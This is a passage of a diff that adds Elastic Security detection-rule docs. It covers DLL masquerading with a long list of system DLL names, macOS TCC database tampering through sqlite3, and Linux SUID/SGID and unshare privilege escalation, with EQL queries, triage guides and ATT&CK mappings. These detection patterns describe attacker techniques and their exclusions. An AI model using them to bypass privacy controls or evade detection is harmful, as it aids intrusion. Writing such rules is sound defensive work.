"sstpsvc.dll", "starttiledata.dll", "startupscan.dll", "stclient.dll", "sti.dll", "sti_ci.dll", "stobject.dll", "storageusage.dll", "storagewmi.dll", "storewuauth.dll", "storprop.dll", "storsvc.dll", "streamci.dll", "structuredquery.dll", "sud.dll", "svf.dll", "svsvc.dll", "swprv.dll", "sxproxy.dll", "sxs.dll", "sxshared.dll", "sxssrv.dll", "sxsstore.dll", "synccenter.dll", "synccontroller.dll", "synchostps.dll", "syncproxy.dll", "syncreg.dll", "syncres.dll", "syncsettings.dll", "syncutil.dll", "sysclass.dll", "sysfxui.dll", "sysmain.dll", "sysntfy.dll", "syssetup.dll", "systemcpl.dll", "t2embed.dll", "tabbtn.dll", "tabbtnex.dll", "tabsvc.dll", "tapi3.dll", "tapi32.dll", "tapilua.dll", "tapimigplugin.dll", "tapiperf.dll", "tapisrv.dll", "tapisysprep.dll", "tapiui.dll", "taskapis.dll", "taskbarcpl.dll", "taskcomp.dll", "taskschd.dll", "taskschdps.dll", "tbauth.dll", "tbs.dll", "tcbloader.dll", "tcpipcfg.dll", "tcpmib.dll", "tcpmon.dll", "tcpmonui.dll", "tdh.dll", "tdlmigration.dll", "tellib.dll", "termmgr.dll", "termsrv.dll", "tetheringclient.dll", "tetheringmgr.dll", "tetheringservice.dll", "tetheringstation.dll", "textshaping.dll", "themecpl.dll", "themeservice.dll", "themeui.dll", "threadpoolwinrt.dll", "thumbcache.dll", "timebrokerclient.dll", "timebrokerserver.dll", "timesync.dll", "timesynctask.dll", "tlscsp.dll", "tokenbinding.dll", "tokenbroker.dll", "tokenbrokerui.dll", "tpmcertresources.dll", "tpmcompc.dll", "tpmtasks.dll", "tpmvsc.dll", "tquery.dll", "traffic.dll", "transportdsa.dll", "trie.dll", "trkwks.dll", "tsbyuv.dll", "tscfgwmi.dll", "tserrredir.dll", "tsf3gip.dll", "tsgqec.dll", "tsmf.dll", "tspkg.dll", "tspubwmi.dll", "tssessionux.dll", "tssrvlic.dll", "tsworkspace.dll", "ttdloader.dll", "ttdplm.dll", "ttdrecord.dll", "ttdrecordcpu.dll", "ttlsauth.dll", "ttlscfg.dll", "ttlsext.dll", "tvratings.dll", "twext.dll", "twinapi.dll", "twinui.dll", "txflog.dll", "txfw32.dll", "tzautoupdate.dll", "tzres.dll", "tzsyncres.dll", "ubpm.dll", "ucmhc.dll", "ucrtbase.dll", "ucrtbase_clr0400.dll", "ucrtbase_enclave.dll", "udhisapi.dll", "udwm.dll", "ueficsp.dll", "uexfat.dll", "ufat.dll", "uiamanager.dll", "uianimation.dll", "uiautomationcore.dll", "uicom.dll", "uireng.dll", "uiribbon.dll", "uiribbonres.dll", "ulib.dll", "umb.dll", "umdmxfrm.dll", "umpdc.dll", "umpnpmgr.dll", "umpo-overrides.dll", "umpo.dll", "umpoext.dll", "umpowmi.dll", "umrdp.dll", "unattend.dll", "unenrollhook.dll", "unimdmat.dll", "uniplat.dll", "unistore.dll", "untfs.dll", "updateagent.dll", "updatecsp.dll", "updatepolicy.dll", "upnp.dll", "upnphost.dll", "upshared.dll", "urefs.dll", "urefsv1.dll", "ureg.dll", "url.dll", "urlmon.dll", "usbcapi.dll", "usbceip.dll", "usbmon.dll", "usbperf.dll", "usbpmapi.dll", "usbtask.dll", "usbui.dll", "user32.dll", "usercpl.dll", "userdataservice.dll", "userdatatimeutil.dll", "userenv.dll", "userinitext.dll", "usermgr.dll", "usermgrcli.dll", "usermgrproxy.dll", "usoapi.dll", "usocoreps.dll", "usosvc.dll", "usp10.dll", "ustprov.dll", "utcutil.dll", "utildll.dll", "uudf.dll", "uvcmodel.dll", "uwfcfgmgmt.dll", "uwfcsp.dll", "uwfservicingapi.dll", "uxinit.dll", "uxlib.dll", "uxlibres.dll", "uxtheme.dll", "vac.dll", "van.dll", "vault.dll", "vaultcds.dll", "vaultcli.dll", "vaultroaming.dll", "vaultsvc.dll", "vbsapi.dll", "vbscript.dll", "vbssysprep.dll", "vcardparser.dll", "vdsbas.dll", "vdsdyn.dll", "vdsutil.dll", "vdsvd.dll", "vds_ps.dll", "verifier.dll", "vertdll.dll", "vfuprov.dll", "vfwwdm32.dll", "vhfum.dll", "vid.dll", "videohandlers.dll", "vidreszr.dll", "virtdisk.dll", "vmbuspipe.dll", "vmdevicehost.dll", "vmictimeprovider.dll", "vmrdvcore.dll", "voiprt.dll", "vpnike.dll", "vpnikeapi.dll", "vpnsohdesktop.dll", "vpnv2csp.dll", "vscmgrps.dll", "vssapi.dll", "vsstrace.dll", "vss_ps.dll", "w32time.dll", "w32topl.dll", "waasassessment.dll", "waasmediccapsule.dll", "waasmedicps.dll", "waasmedicsvc.dll", "wabsyncprovider.dll", "walletproxy.dll", "walletservice.dll", "wavemsp.dll", "wbemcomn.dll", "wbiosrvc.dll", "wci.dll", "wcimage.dll", "wcmapi.dll", "wcmcsp.dll", "wcmsvc.dll", "wcnapi.dll", "wcncsvc.dll", "wcneapauthproxy.dll", "wcneappeerproxy.dll", "wcnnetsh.dll", "wcnwiz.dll", "wc_storage.dll", "wdc.dll", "wdi.dll", "wdigest.dll", "wdscore.dll", "webauthn.dll", "webcamui.dll", "webcheck.dll", "webclnt.dll", "webio.dll", "webservices.dll", "websocket.dll", "wecapi.dll", "wecsvc.dll", "wephostsvc.dll", "wer.dll", "werconcpl.dll", "wercplsupport.dll", "werenc.dll", "weretw.dll", "wersvc.dll", "werui.dll", "wevtapi.dll", "wevtfwd.dll", "wevtsvc.dll", "wfapigp.dll", "wfdprov.dll", "wfdsconmgr.dll", "wfdsconmgrsvc.dll", "wfhc.dll", "whealogr.dll", "whhelper.dll", "wiaaut.dll", "wiadefui.dll", "wiadss.dll", "wiarpc.dll", "wiascanprofiles.dll", "wiaservc.dll", "wiashext.dll", "wiatrace.dll", "wificloudstore.dll", "wificonfigsp.dll", "wifidisplay.dll", "wimgapi.dll", "win32spl.dll", "win32u.dll", "winbio.dll", "winbiodatamodel.dll", "winbioext.dll", "winbrand.dll", "wincorlib.dll", "wincredprovider.dll", "wincredui.dll", "windowmanagement.dll", "windowscodecs.dll", "windowscodecsext.dll", "windowscodecsraw.dll", "windowsiotcsp.dll", "windowslivelogin.dll", "winethc.dll", "winhttp.dll", "winhttpcom.dll", "winhvemulation.dll", "winhvplatform.dll", "wininet.dll", "wininetlui.dll", "wininitext.dll", "winipcfile.dll", "winipcsecproc.dll", "winipsec.dll", "winlangdb.dll", "winlogonext.dll", "winmde.dll", "winml.dll", "winmm.dll", "winmmbase.dll", "winmsipc.dll", "winnlsres.dll", "winnsi.dll", "winreagent.dll", "winrnr.dll", "winrscmd.dll", "winrsmgr.dll", "winrssrv.dll", "winrttracing.dll", "winsatapi.dll", "winscard.dll", "winsetupui.dll", "winshfhc.dll", "winsku.dll", "winsockhc.dll", "winsqlite3.dll", "winsrpc.dll", "winsrv.dll", "winsrvext.dll", "winsta.dll", "winsync.dll", "winsyncmetastore.dll", "winsyncproviders.dll", "wintrust.dll", "wintypes.dll", "winusb.dll", "wirednetworkcsp.dll", "wisp.dll", "wkscli.dll", "wkspbrokerax.dll", "wksprtps.dll", "wkssvc.dll", "wlanapi.dll", "wlancfg.dll", "wlanconn.dll", "wlandlg.dll", "wlangpui.dll", "wlanhc.dll", "wlanhlp.dll", "wlanmediamanager.dll", "wlanmm.dll", "wlanmsm.dll", "wlanpref.dll", "wlanradiomanager.dll", "wlansec.dll", "wlansvc.dll", "wlansvcpal.dll", "wlanui.dll", "wlanutil.dll", "wldap32.dll", "wldp.dll", "wlgpclnt.dll", "wlidcli.dll", "wlidcredprov.dll", "wlidfdp.dll", "wlidnsp.dll", "wlidprov.dll", "wlidres.dll", "wlidsvc.dll", "wmadmod.dll", "wmadmoe.dll", "wmalfxgfxdsp.dll", "wmasf.dll", "wmcodecdspps.dll", "wmdmlog.dll", "wmdmps.dll", "wmdrmsdk.dll", "wmerror.dll", "wmi.dll", "wmiclnt.dll", "wmicmiplugin.dll", "wmidcom.dll", "wmidx.dll", "wmiprop.dll", "wmitomi.dll", "wmnetmgr.dll", "wmp.dll", "wmpdui.dll", "wmpdxm.dll", "wmpeffects.dll", "wmphoto.dll", "wmploc.dll", "wmpps.dll", "wmpshell.dll", "wmsgapi.dll", "wmspdmod.dll", "wmspdmoe.dll", "wmvcore.dll", "wmvdecod.dll", "wmvdspa.dll", "wmvencod.dll", "wmvsdecd.dll", "wmvsencd.dll", "wmvxencd.dll", "woftasks.dll", "wofutil.dll", "wordbreakers.dll", "workfoldersgpext.dll", "workfoldersres.dll", "workfoldersshell.dll", "workfolderssvc.dll", "wosc.dll", "wow64.dll", "wow64cpu.dll", "wow64win.dll", "wpbcreds.dll", "wpc.dll", "wpcapi.dll", "wpcdesktopmonsvc.dll", "wpcproxystubs.dll", "wpcrefreshtask.dll", "wpcwebfilter.dll", "wpdbusenum.dll", "wpdshext.dll", "wpdshserviceobj.dll", "wpdsp.dll", "wpd_ci.dll", "wpnapps.dll", "wpnclient.dll", "wpncore.dll", "wpninprc.dll", "wpnprv.dll", "wpnservice.dll", "wpnsruprov.dll", "wpnuserservice.dll", "wpportinglibrary.dll", "wpprecorderum.dll", "wptaskscheduler.dll", "wpx.dll", "ws2help.dll", "ws2_32.dll", "wscapi.dll", "wscinterop.dll", "wscisvif.dll", "wsclient.dll", "wscproxystub.dll", "wscsvc.dll", "wsdapi.dll", "wsdchngr.dll", "wsdprintproxy.dll", "wsdproviderutil.dll", "wsdscanproxy.dll", "wsecedit.dll", "wsepno.dll", "wshbth.dll", "wshcon.dll", "wshelper.dll", "wshext.dll", "wshhyperv.dll", "wship6.dll", "wshqos.dll", "wshrm.dll", "wshtcpip.dll", "wshunix.dll", "wslapi.dll", "wsmagent.dll", "wsmauto.dll", "wsmplpxy.dll", "wsmres.dll", "wsmsvc.dll", "wsmwmipl.dll", "wsnmp32.dll", "wsock32.dll", "wsplib.dll", "wsp_fs.dll", "wsp_health.dll", "wsp_sr.dll", "wtsapi32.dll", "wuapi.dll", "wuaueng.dll", "wuceffects.dll", "wudfcoinstaller.dll", "wudfplatform.dll", "wudfsmcclassext.dll", "wudfx.dll", "wudfx02000.dll", "wudriver.dll", "wups.dll", "wups2.dll", "wuuhext.dll", "wuuhosdeployment.dll", "wvc.dll", "wwaapi.dll", "wwaext.dll", "wwanapi.dll", "wwancfg.dll", "wwanhc.dll", "wwanprotdim.dll", "wwanradiomanager.dll", "wwansvc.dll", "wwapi.dll", "xamltilerender.dll", "xaudio2_8.dll", "xaudio2_9.dll", "xblauthmanager.dll", "xblgamesave.dll", "xblgamesaveext.dll", "xblgamesaveproxy.dll", "xboxgipsvc.dll", "xboxgipsynthetic.dll", "xboxnetapisvc.dll", "xinput1_4.dll", "xinput9_1_0.dll", "xinputuap.dll", "xmlfilter.dll", "xmllite.dll", "xmlprovi.dll", "xolehlp.dll", "xpsgdiconverter.dll", "xpsprint.dll", "xpspushlayer.dll", "xpsrasterservice.dll", "xpsservices.dll", "xwizards.dll", "xwreg.dll", "xwtpdui.dll", "xwtpw32.dll", "zipcontainer.dll", "zipfldr.dll", "bootsvc.dll", "halextintcpsedma.dll", "icsvcvss.dll", "ieproxydesktop.dll", "lsaadt.dll", "nlansp_c.dll", "nrtapi.dll", "opencl.dll", "pfclient.dll", "pnpdiag.dll", "prxyqry.dll", "rdpnanotransport.dll", "servicingcommon.dll", "sortwindows63.dll", "sstpcfg.dll", "tdhres.dll", "umpodev.dll", "utcapi.dll", "windlp.dll", "wow64base.dll", "wow64con.dll", "blbuires.dll", "bpainst.dll", "cbclient.dll", "certadm.dll", "certocm.dll", "certpick.dll", "csdeployres.dll", "dsdeployres.dll", "eapa3hst.dll", "eapacfg.dll", "eapahost.dll", "elsext.dll", "encdump.dll", "escmigplugin.dll", "fsclient.dll", "fsdeployres.dll", "fssminst.dll", "fssmres.dll", "fssprov.dll", "ipamapi.dll", "kpssvc.dll", "lbfoadminlib.dll", "mintdh.dll", "mmci.dll", "mmcico.dll", "mprsnap.dll", "mstsmhst.dll", "mstsmmc.dll", "muxinst.dll", "personax.dll", "rassfm.dll", "rasuser.dll", "rdmsinst.dll", "rdmsres.dll", "rtrfiltr.dll", "sacsvr.dll", "scrdenrl.dll", "sdclient.dll", "sharedstartmodel.dll", "smsrouter.dll", "spwizimg_svr.dll", "sqlcecompact40.dll", "sqlceoledb40.dll", "sqlceqp40.dll", "sqlcese40.dll", "srvmgrinst.dll", "svrmgrnc.dll", "tapisnap.dll", "tlsbrand.dll", "tsec.dll", "tsprop.dll", "tspubiconhelper.dll", "tssdjet.dll", "tsuserex.dll", "ualapi.dll", "ualsvc.dll", "umcres.dll", "updatehandlers.dll", "usocore.dll", "vssui.dll", "wsbappres.dll", "wsbonline.dll", "wsmselpl.dll", "wsmselrr.dll", "xpsfilt.dll", "xpsshhdr.dll" + ) and + not ( + ( + dll.name : "icuuc.dll" and dll.code_signature.subject_name in ( + "Valve", "Valve Corp.", "Avanquest Software (7270356 Canada Inc)", "Adobe Inc." + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : ("timeSync.dll", "appInfo.dll") and dll.code_signature.subject_name in ( + "VMware Inc.", "VMware, Inc.", "Broadcom Inc" + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : "libcrypto.dll" and dll.code_signature.subject_name in ( + "NoMachine S.a.r.l.", "Oculus VR, LLC" + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : "ucrtbase.dll" and dll.code_signature.subject_name in ( + "Proofpoint, Inc.", "Rapid7 LLC", "Eclipse.org Foundation, Inc.", "Amazon.com Services LLC", "Windows Phone", "London Jamocha Community CIC", "Palo Alto Networks (Netherlands) B.V.", "Sophos Ltd" + ) and dll.code_signature.trusted == true + ) or + ( + dll.name : "d3d9.dll" and dll.code_signature.subject_name == "Open Source Developer Alban CLIQUET" and dll.code_signature.trusted == true + ) or + ( + dll.name : ("libcrypto.dll", "wmi.dll", "geolocation.dll", "kerberos.dll", "UpdateAgent.dll") and + dll.code_signature.subject_name == "Bitdefender SRL" and dll.code_signature.trusted == true + ) or + (dll.name : "ICMP.dll" and dll.code_signature.subject_name == "Paessler AG" and dll.code_signature.trusted == true) or + (dll.name : "dbghelp.dll" and dll.code_signature.trusted == true) or + (dll.name : "DirectML.dll" and dll.code_signature.subject_name == "Adobe Inc." and dll.code_signature.trusted == true) or + (dll.name : "icsvc.dll" and dll.code_signature.subject_name in ("Dell Inc", "Dell Technologies Inc.") and dll.code_signature.trusted == true) or + (dll.name : "offreg.dll" and dll.code_signature.subject_name in ("Malwarebytes Inc.", "Malwarebytes Inc") and dll.code_signature.trusted == true) or + (dll.name : ("AppMgr.dll", "icuuc.dll") and dll.code_signature.subject_name in ("Autodesk, Inc", "Autodesk, Inc.") and dll.code_signature.trusted == true) or + (dll.name : ("SsShim.dll", "Msi.dll", "wdscore.dll") and process.name : "DismHost.exe" and dll.path : "C:\\Windows\\Temp\\*") or + (dll.code_signature.trusted == true and + dll.code_signature.subject_name in ( + "ALIBABA CLOUD COMPUTING LTD", + "Epic Systems Corporation", + "Google LLC", + "Agilysys, Inc.", + "CD PROJEKT S.A.", + "Check Point Software Technologies Ltd.", + "Dedalus Italia S.P.A.", + "AOMEI International Network Limited", + "CHENGDU AOMEI TECHNOLOGY CO., LTD.", + "GN Hearing A/S", + "Paessler GmbH", + "Symantec Corporation")) or + ( + dll.path : ( + "?:\\Windows\\SystemApps\\*\\dxgi.dll", + "?:\\Windows\\SystemApps\\*\\wincorlib.dll", + "?:\\Windows\\dxgi.dll", + "?:\\Users\\*\\AppData\\Local\\LINE\\bin\\current\\dbghelp.dll", + "?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\dbghelp.dll", + "?:\\Program Files (x86)\\Common Files\\Crystal Decision\\2.0\\bin\\atl.dll" + ) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Resource Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Technique: +** Name: Subvert Trust Controls +** ID: T1553 +** Reference URL: https://attack.mitre.org/techniques/T1553/ +* Sub-technique: +** Name: Code Signing +** ID: T1553.002 +** Reference URL: https://attack.mitre.org/techniques/T1553/002/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL +** ID: T1574.001 +** Reference URL: https://attack.mitre.org/techniques/T1574/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Host Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privacy-control-bypass-via-tccdb-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privacy-control-bypass-via-tccdb-modification.asciidoc new file mode 100644 index 0000000000..28fb23668f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privacy-control-bypass-via-tccdb-modification.asciidoc @@ -0,0 +1,165 @@ +[[prebuilt-rule-8-19-32-potential-privacy-control-bypass-via-tccdb-modification]] +=== Potential Privacy Control Bypass via TCCDB Modification + +Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/ +* https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh +* https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8 + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 115 + +*Rule authors*: + +* Elastic +* Massimo Bertocchi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Privacy Control Bypass via TCCDB Modification* + + +The Transparency, Consent, and Control (TCC) database in macOS manages app permissions for accessing sensitive resources. Adversaries may exploit this by using tools like sqlite3 to alter the TCC database, bypassing privacy controls. The detection rule identifies such attempts by monitoring for suspicious sqlite3 activity targeting the TCC database, excluding legitimate processes, to flag potential privacy control bypasses. + + +*Possible investigation steps* + + +- Review the process details to confirm the use of sqlite3, focusing on the process name and arguments to ensure they match the pattern "sqlite*" and include the path "/*/Application Support/com.apple.TCC/TCC.db". +- Investigate the parent process of the sqlite3 activity to determine if it is a known legitimate process or if it appears suspicious, especially if it is not from "/Library/Bitdefender/AVP/product/bin/*". +- Check the timestamp of the sqlite3 activity to correlate it with any other unusual system behavior or alerts that occurred around the same time. +- Examine the user account associated with the process to determine if it has a history of legitimate administrative actions or if it might be compromised. +- Look for any recent changes or anomalies in the TCC database permissions that could indicate unauthorized modifications. +- Assess the system for other signs of compromise, such as unexpected network connections or additional unauthorized processes running, to determine if the sqlite3 activity is part of a larger attack. + + +*False positive analysis* + + +- Security software like Bitdefender may legitimately access the TCC database for scanning purposes. To prevent these from being flagged, ensure that the process parent executable path for such software is added to the exclusion list. +- System maintenance tools that perform regular checks or backups might access the TCC database. Identify these tools and add their process paths to the exclusion list to avoid false alerts. +- Developer tools used for testing applications may interact with the TCC database. If these tools are frequently used in your environment, consider excluding their process paths to reduce noise. +- Administrative scripts that automate system configurations might modify the TCC database. Review these scripts and, if deemed safe, exclude their process paths from the detection rule. +- Regular system updates or patches could trigger access to the TCC database. Monitor these events and, if consistent with update schedules, adjust the rule to exclude these specific update processes. + + +*Response and remediation* + + +- Immediately isolate the affected macOS system from the network to prevent further unauthorized access or data exfiltration. +- Terminate any suspicious sqlite3 processes identified in the alert to stop ongoing unauthorized modifications to the TCC database. +- Restore the TCC database from a known good backup to ensure that all privacy settings are reverted to their legitimate state. +- Conduct a thorough review of recent changes to the TCC database to identify any unauthorized access or modifications to sensitive resources. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected. +- Implement additional monitoring on the affected system to detect any further attempts to modify the TCC database or other unauthorized activities. +- Review and update access controls and permissions for the TCC database to ensure only authorized processes can make changes, reducing the risk of future bypass attempts. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name like~ "sqlite*" and + process.args like "/*/Application Support/com.apple.TCC/TCC.db" and + (process.parent.name like~ ("osascript", "bash", "sh", "zsh", "Terminal", "Python*") or (process.parent.code_signature.exists == false or process.parent.code_signature.trusted == false)) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: TCC Manipulation +** ID: T1548.006 +** Reference URL: https://attack.mitre.org/techniques/T1548/006/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-suid-sgid.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-suid-sgid.asciidoc new file mode 100644 index 0000000000..cf0b2bbe42 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-suid-sgid.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-32-potential-privilege-escalation-via-suid-sgid]] +=== Potential Privilege Escalation via SUID/SGID + +Detects potential privilege escalation under the root effective user when the real user and parent user are not root, indicative of the execution of binaries with SUID or SGID bits set. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1548/ + +*Tags*: + +* Data Source: Elastic Defend +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Privilege Escalation via SUID/SGID* + + +Adversaries exploit misconfigured SUID/SGID binaries to gain elevated access or persistence. This rule identifies processes running with root privileges but initiated by non-root users, flagging potential misuse of SUID/SGID permissions. + + +*Possible investigation steps* + + +- Inspect `process.parent.command_line` and working directory for obfuscation or one-liners. +- Check authentication and sudoers policy for the user. +- Pivot on the host for additional privilege escalation or persistence in the same session. + + +*Response and remediation* + + +- If unauthorized, contain the session, revoke elevated access, and review sudoers and polkit policy for tampering. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + (process.user.id == "0" and process.real_user.id != "0" and process.parent.user.id != "0") or + (process.group.id == "0" and process.real_group.id != "0" and process.parent.group.id != "0") +) and +( + startsWith(process.executable, process.command_line) or + startsWith(process.name, process.command_line) +) and +( + process.parent.name like (".*", "python*", "perl*", "ruby*", "lua*", "php*", "node", "deno", "bun", "java") or + process.parent.executable like ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/run/user/*", "/var/run/user/*", "/home/*/*") or + ( + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "mksh") and + process.parent.args in ("-c", "-cl", "-lc", "--command", "-ic", "-ci", "-bash", "-sh", "-zsh", "-dash", "-fish", "-ksh", "-mksh") and + process.parent.args_count <= 4 + ) +) and +not ( + /* Common SUID/SGID binaries (subset also covered by e7856173-6489-449f-80ec-c1f5fcd7b87c); excluded here to reduce noise */ + process.name in ( + "unix_chkpwd", "fusermount", "fusermount3", "umount", "newgrp", "chsh", "sudoedit", "gpasswd", "chfn", "polkit-agent-helper-1", + "dbus-daemon-launch-helper", "ssh-keysign", "pam_extrausers_chkpwd", "expiry", "chage", "wall", "bsd-write", "ssh-agent", + "ping6", "traceroute", "mtr", "ntfs-3g", "Xorg.wrap", "chrome-sandbox", "bwrap", "hostname", "sudo", "su", "pkexec", "passwd", + "mount" + ) or + (process.executable == "/usr/lib/landscape/apt-update" and process.args == "/usr/lib/landscape/apt-update") or + (process.executable == "/usr/bin/mount" and process.args in ("/usr/bin/mount", "mount")) or + (process.executable like "/u0?/app/agent/agent_*/sbin/nmo" and process.args like "/u0?/app/agent/agent_*/sbin/nmo") or + (process.executable == "/usr/bin/screen" and process.args == "screen") or + (process.executable == "/usr/sbin/playpen" and process.args == "/usr/sbin/playpen") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-unshare-and-uid-change.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-unshare-and-uid-change.asciidoc new file mode 100644 index 0000000000..68d9471a66 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-privilege-escalation-via-unshare-and-uid-change.asciidoc @@ -0,0 +1,155 @@ +[[prebuilt-rule-8-19-32-potential-privilege-escalation-via-unshare-and-uid-change]] +=== Potential Privilege Escalation via unshare and UID Change + +Identifies potentially suspicious use of unshare to create a user namespace context followed by a UID change event indicating a transition to root. Adversaries may use unshare-based primitives as part of local privilege escalation chains. This rule is intentionally generic and can surface multiple local privesc patterns beyond a single CVE. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability +* https://twitter.com/liadeliyahu/status/1684841527959273472 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 13 + +*Rule authors*: + +* Elastic +* Massimo Bertocchi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Privilege Escalation via 